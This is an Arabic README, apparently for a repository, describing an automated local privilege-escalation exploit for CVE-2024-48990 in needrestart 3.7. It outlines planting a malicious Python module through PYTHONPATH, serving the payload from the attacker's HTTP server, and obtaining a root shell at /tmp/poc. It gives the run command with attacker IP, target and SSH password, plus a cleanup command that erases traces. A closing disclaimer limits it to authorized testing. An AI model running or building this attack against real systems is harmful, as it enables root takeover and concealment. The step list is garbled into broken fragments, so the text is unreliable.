
أداة استغلال آلية لتصعيد الصلاحيات المحلية لـ CVE-2024-48990 (needrestart v3.7)، تستغل اختطاف PYTHONPATH للحصول على وصول الجذر.
تعمل هذه الأداة على أتمتة استغلال ثغرة تصعيد الصلاحيات في needrestart الإصدار 3.7، المعروفة باسم CVE-2024-48990.
تحقق التنفيذ بصلاحيات الجذر من خلال استغلال الاستخدام غير الآمن لمتغير البيئة PYTHONPATH عند قيام needrestart بفحص عمليات بايثون.
يعمل الاستغلال على النحو التالي:
__init__.so) يتم تفعيله عند الاستيراد..so عبر خادم HTTP محلي.PYTHONPATH خبيثة.importlib بشكل مستمر.needrestart، الذي يرث مسار PYTHONPATH المُعدّل، ويقوم بتحميل الوحدة الخبيثة، وتنفيذ الحمولة كجذر./tmp/poc)، مما يسمح بالوصول إلى شل جذر.قم بتشغيل الاستغلال من جهازك المهاجم:
python3 exploit.py --user <ssh_user> --host <target_ip> --att-ip <attacker_ip> --ssh-pass <ssh_password>
المعاملات:
needrestart الإصدار 3.7لإزالة آثار الاستغلال من الهدف:
rm -rf /tmp/malicious /tmp/poc /tmp/exploit.sh
pexpect (pip3 install pexpect)gcc (لتجميع الحمولة)python3 -m http.server (يتم تشغيله تلقائياً بواسطة النص البرمجي)needrestart (الإصدار 3.7)sudo NOPASSWD لـ /usr/sbin/needrestartcurlهذه الأداة مُقدمة للأغراض التعليمية واختبار الأمان المصرح به فقط. لا تستخدمها على أنظمة لا تملكها أو بدون إذن صريح.